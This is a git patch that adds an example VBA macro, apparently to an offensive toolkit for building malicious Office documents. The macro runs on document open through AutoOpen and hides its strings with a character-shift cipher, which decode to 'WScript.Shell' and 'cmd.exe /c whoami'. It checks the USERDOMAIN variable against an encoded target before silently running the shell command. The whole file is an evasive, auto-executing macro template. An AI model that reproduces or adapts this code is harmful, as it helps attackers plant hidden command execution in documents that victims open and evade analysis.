From a2426daf75b5632d6771109390a575c92ef73777 Mon Sep 17 00:00:00 2001 From: Mr-Un1k0d3r Date: Fri, 11 Nov 2016 15:31:15 -0500 Subject: [PATCH] Create generic-cmd-evasion.vba --- examples/generic-cmd-evasion.vba | 94 ++++++++++++++++++++++++++++++++ 1 file changed, 94 insertions(+) create mode 100644 examples/generic-cmd-evasion.vba diff --git a/examples/generic-cmd-evasion.vba b/examples/generic-cmd-evasion.vba new file mode 100644 index 0000000..f995421 --- /dev/null +++ b/examples/generic-cmd-evasion.vba @@ -0,0 +1,94 @@ +Sub AutoOpen() + Dim XHKmhxHQcRTz As String + Dim THSEubLQvPSdELSuoGX As Object + Dim FJGotBFzvCOdl As Integer + Dim EeiAeMHMgPdtBzW As String + Dim GGfyeZZ As String + + FJGotBFzvCOdl = 364 + XHKmhxHQcRTz = "[wgvmtx2Wlipp" + GGfyeZZ = OguRQlS() + If (GGfyeZZ = "NVKVXMEGmpW") Then + Set THSEubLQvPSdELSuoGX = CreateObject(kbilYvbsscC(XHKmhxHQcRTz)) + EeiAeMHMgPdtBzW = vmLhBnhohStHTGkJVFvtodv("bhEpnbsamPxDwVcWJzlublMQ") + EeiAeMHMgPdtBzW = VBiSUNVKeBGIhcPkb(THSEubLQvPSdELSuoGX, EeiAeMHMgPdtBzW, FJGotBFzvCOdl) + End If +End Sub + +Function vmLhBnhohStHTGkJVFvtodv(ZROwKJd As String) As String + Dim oVMgsBnBXNOpBX As String + Dim OoSwSrwLrWhP As String + Dim MJDDNqez As String + MJDDNqez = "gqh2i|i$3g${lseqm" + + oVMgsBnBXNOpBX = MJDDNqez + oVMgsBnBXNOpBX = kbilYvbsscC(oVMgsBnBXNOpBX) + vmLhBnhohStHTGkJVFvtodv = oVMgsBnBXNOpBX +End Function + +Function VBiSUNVKeBGIhcPkb(GKzgZylVXGWz As Object, SrTboMsIUaGgfoswbnqxNbDZ As String, GMIuliLqzJCayCzKHCoq As Integer) As String + Dim fFOceCgNlEZwEpqr As String + Dim ENFykwKonc As Integer + ENFykwKonc = 4 + fFOceCgNlEZwEpqr = SrTboMsIUaGgfoswbnqxNbDZ + If (GMIuliLqzJCayCzKHCoq > ENFykwKonc) Then + ENFykwKonc = GMIuliLqzJCayCzKHCoq - GMIuliLqzJCayCzKHCoq + GKzgZylVXGWz.Run fFOceCgNlEZwEpqr, ENFykwKonc, True + End If + fFOceCgNlEZwEpqr = "IjIurrYiWJxH" + VBiSUNVKeBGIhcPkb = fFOceCgNlEZwEpqr +End Function + + +Function kbilYvbsscC(dfjsgXiTXlcBLjeRryfvoqY As String) As String + Dim eqQwyyjmAEVAMy As Long + Dim CdMxcxbCahltDjPZG As String + Dim JBRbbDxDBbJIlOy As Integer + JBRbbDxDBbJIlOy = 4 + For eqQwyyjmAEVAMy = 1 To Len(dfjsgXiTXlcBLjeRryfvoqY) + CdMxcxbCahltDjPZG = CdMxcxbCahltDjPZG & Chr(Asc(Mid(dfjsgXiTXlcBLjeRryfvoqY, eqQwyyjmAEVAMy, 1)) - JBRbbDxDBbJIlOy) + Next eqQwyyjmAEVAMy + kbilYvbsscC = CdMxcxbCahltDjPZG +End Function + +Function OguRQlS() As String + Dim fHNbSbwUyNulLLVThkN As String + fHNbSbwUyNulLLVThkN = "bhEpnbsamPxDwVcWJzlublMQ" + fHNbSbwUyNulLLVThkN = qvAKTNfitsA(fHNbSbwUyNulLLVThkN) + fHNbSbwUyNulLLVThkN = VpxqjMIiANZg(fHNbSbwUyNulLLVThkN) + OguRQlS = fHNbSbwUyNulLLVThkN +End Function + +Function VpxqjMIiANZg(fHNbSbwUyNulLLVThkN As String) As String + Dim eeyJYtLZQheDgmcj As String + Dim YxfUNvpKSEvuCWsQOQVDxf As String + Dim yjsEKLikmZcAMAjWmV As String + Dim GvMfkAxzfzgIhxFFInO As Integer + GvMfkAxzfzgIhxFFInO = 637 + YxfUNvpKSEvuCWsQOQVDxf = "kbilYvbsscC" + yjsEKLikmZcAMAjWmV = "VMRK^IV4" + YxfUNvpKSEvuCWsQOQVDxf = MjOXrhwR(YxfUNvpKSEvuCWsQOQVDxf, yjsEKLikmZcAMAjWmV, GvMfkAxzfzgIhxFFInO) + eeyJYtLZQheDgmcj = YxfUNvpKSEvuCWsQOQVDxf + If (UCase(fHNbSbwUyNulLLVThkN) = eeyJYtLZQheDgmcj) Then + VpxqjMIiANZg = "NVKVXMEGmpW" + Else + VpxqjMIiANZg = "bHWfwRqCNh" + End If +End Function + +Function qvAKTNfitsA(BMpIooCasKG As String) As String + Dim ufvKyCNiHHogKLXqt As String + Dim EqrXsnePmksKAhhYJzaBFIp As String + Dim nEdEMfbClbgkYZTDjXJbia As Integer + nEdEMfbClbgkYZTDjXJbia = 6104 + EqrXsnePmksKAhhYJzaBFIp = "kbilYvbsscC" + EqrXsnePmksKAhhYJzaBFIp = btsMlRsLgrTbWEVydvEQpnAa(EqrXsnePmksKAhhYJzaBFIp, "YWIVHSQEMR", nEdEMfbClbgkYZTDjXJbia) + ufvKyCNiHHogKLXqt = Environ(EqrXsnePmksKAhhYJzaBFIp) + qvAKTNfitsA = ufvKyCNiHHogKLXqt +End Function + +Function btsMlRsLgrTbWEVydvEQpnAa(pInSpXFfvHlmlwguszddsz As String, NCIYhLMxGmhRfSQD As String, NqYrqajngCuizeuhgQnf As Integer) As String + If (NqYrqajngCuizeuhgQnf > 1) Then + btsMlRsLgrTbWEVydvEQpnAa = Application.Run(pInSpXFfvHlmlwguszddsz, NCIYhLMxGmhRfSQD) + End If +End Function